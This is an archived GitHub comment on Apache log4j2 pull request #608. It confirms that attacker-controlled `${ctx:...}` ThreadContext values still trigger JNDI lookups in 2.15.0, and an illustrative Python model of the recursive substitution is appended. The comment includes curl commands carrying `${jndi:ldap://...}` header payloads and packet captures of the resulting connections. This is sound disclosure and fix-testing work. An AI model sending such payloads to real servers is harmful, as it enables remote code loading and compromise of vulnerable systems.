Posted to notifications@logging.apache.org by GitBox <gi...@apache.org> on 2021/12/14 12:00:17 UTC

[GitHub] [logging-log4j2] SpComb commented on pull request #608: Restrict LDAP access via JNDI

SpComb commented on pull request #608:
URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993469509


   > Following up on my question if this fixes usage with other property substitutions like ctx: [#608 (comment)](https://github.com/apache/logging-log4j2/pull/608#issuecomment-992427010)
   > 
   > Apparently I could confirm my assumption regarding the usage of Thread Context Map, I created a PR here ([lunasec-io/lunasec#298](https://github.com/lunasec-io/lunasec/pull/298)) and made changes to the demonstration app to demonstrate the vulnerability even with `formatMsgNoLookups=true` set shown here: https://github.com/kmindi/log4shell-vulnerable-app.
   > 
   > Here is also the diff to see what I changed to demonstrate vulnerable `${ctx.apiversion}` usage in the log pattern: [kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19)
   > 
   > Can someone confirm this?
   
   Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas the attacker-controlled input in the message field does not:
   ```
    41 17.676741911   172.17.0.1 -> 172.17.0.2   HTTP 209 GET / HTTP/1.1 
    42 17.676769664   172.17.0.2 -> 172.17.0.1   TCP 66 8080 > 56934 [ACK] Seq=1 Ack=144 Win=30080 Len=0 TSval=346936700 TSecr=2382643118
    43 17.680613689   172.17.0.2 -> 10.52.0.2    DNS 79 Standard query 0xffa9  A example.net
    44 17.680814368    10.52.0.2 -> 172.17.0.2   DNS 79 Standard query response 0xffa9 No such name
    45 17.687397342   172.17.0.2 -> 172.17.0.1   HTTP 193 HTTP/1.1 200   (text/plain)
   ```
   
   The bad news: this seems to also work with 2.15.0; `X-Api-Version: ${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389:
   
   ```
   $ docker exec -it log4shell-vulnerable-app jar -tvf /app/spring-boot-application.jar  | grep log4j
      828 Tue Dec 14 11:55:34 GMT 2021 BOOT-INF/classes/log4j2.properties
    24231 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-slf4j-impl-2.15.0.jar
   1789769 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-core-2.15.0.jar
    30947 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-jul-2.15.0.jar
   301804 Tue Dec 14 11:55:28 GMT 2021 BOOT-INF/lib/log4j-api-2.15.0.jar
   ```
   
   ```
   $ curl -v "$(docker inspect -f '{{.NetworkSettings.IPAddress}}' log4shell-vulnerable-app):8080/" -H 'X-Api-Version: ${jndi:ldap://localhost/test}'
   *   Trying 172.17.0.2:8080...
   * Connected to 172.17.0.2 (172.17.0.2) port 8080 (#0)
   > GET / HTTP/1.1
   > Host: 172.17.0.2:8080
   > User-Agent: curl/7.76.1
   > Accept: */*
   > X-Api-Version: ${jndi:ldap://localhost/test}
   > 
   * Mark bundle as not supporting multiuse
   < HTTP/1.1 200 
   < Content-Type: text/plain;charset=UTF-8
   < Content-Length: 13
   < Date: Tue, 14 Dec 2021 11:57:10 GMT
   < 
   * Connection #0 to host 172.17.0.2 left intact
   Hello, world![
   ```
   
   ```
   $ sudo nsenter -t "$(docker inspect -f '{{.State.Pid}}' log4shell-vulnerable-app)" -n tshark -i lo -n
   Running as user "root" and group "root". This could be dangerous.
   Capturing on 'Loopback'
     1 0.000000000    127.0.0.1 -> 127.0.0.1    TCP 74 38380 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426441 TSecr=0 WS=128
     2 0.000013194    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38380 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
     3 0.023625945    127.0.0.1 -> 127.0.0.1    TCP 74 38382 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426464 TSecr=0 WS=128
     4 0.023636425    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38382 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
     5 0.027652034    127.0.0.1 -> 127.0.0.1    TCP 74 38384 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426468 TSecr=0 WS=128
     6 0.027662963    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38384 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
     7 0.042974136    127.0.0.1 -> 127.0.0.1    TCP 74 38386 > 389 [SYN] Seq=0 Win=43690 Len=0 MSS=65495 SACK_PERM=1 TSval=1022426484 TSecr=0 WS=128
     8 0.042985398    127.0.0.1 -> 127.0.0.1    TCP 54 389 > 38386 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
   ```
   
   This requires a pattern configured to use `${ctx:...}` lookups with attacker-controlled `ThreadContext` values, which seem to get expanded recursively.
   
   The JNDI restrictions work correctly (no DNS lookups for `example.net`, only `localhost` connections), but the https://issues.apache.org/jira/browse/LOG4J2-3198 "disable message lookups by default" does not seem to apply to `${ctx:...}` lookups.
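As an added example (not part of SpComb's comment or of the Log4j code base), a toy Python model of the substitution behaviour the comment describes: the layout resolves `${ctx:apiversion}` from the context map, and the resolved value is then re-scanned for lookups, so a `${jndi:...}` value in a header becomes a live lookup even though the message field itself is no longer scanned. `PATTERN`, `expand`, `recursive_ctx`, `msg_lookups` and the `<jndi>` stand-in are constructed for illustration and do no network activity.

```python
import re

# Constructed sample layout: the kind of pattern the comment says is required,
# a ThreadContext key interpolated next to the message (%m).
PATTERN = "%m apiversion=${ctx:apiversion}"
LOOKUP = re.compile(r"\$\{([a-z]+):([^{}]*)\}")


def expand(pattern, message, ctx, *, recursive_ctx, msg_lookups):
    """Render one log line; return (rendered_line, lookups_performed).

    recursive_ctx=True  : a value pulled from the context map is itself
                          re-scanned for ${...} (what the comment observes)
    recursive_ctx=False : resolved context values are treated as literal text
    msg_lookups=True    : the %m field is also scanned for lookups
    msg_lookups=False   : models formatMsgNoLookups=true, message is verbatim
    """
    performed = []

    def resolve(m):
        scheme, arg = m.groups()
        performed.append(f"{scheme}:{arg}")
        if scheme == "ctx":
            value = ctx.get(arg, "")
            # The dangerous step: substitute the attacker-controlled value
            # and then re-scan it, turning its ${jndi:...} into a lookup.
            return LOOKUP.sub(resolve, value) if recursive_ctx else value
        if scheme == "jndi":
            return "<jndi>"  # stand-in result; no real JNDI/LDAP call here
        return m.group(0)  # unknown scheme: leave the text untouched

    if msg_lookups:
        # Message becomes part of the text that is substituted.
        line = LOOKUP.sub(resolve, pattern.replace("%m", message))
    else:
        # Only the layout is substituted; the message is appended verbatim.
        line = LOOKUP.sub(resolve, pattern).replace("%m", message)
    return line, performed


def jndi_lookups(performed):
    """Filter the trace down to the lookups that would reach the network."""
    return [entry for entry in performed if entry.startswith("jndi:")]
```

Running the three modes with a `${jndi:...}` in the message and another in the context value shows why `formatMsgNoLookups` stops the first but not the second, while a non-recursive context lookup stops both.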

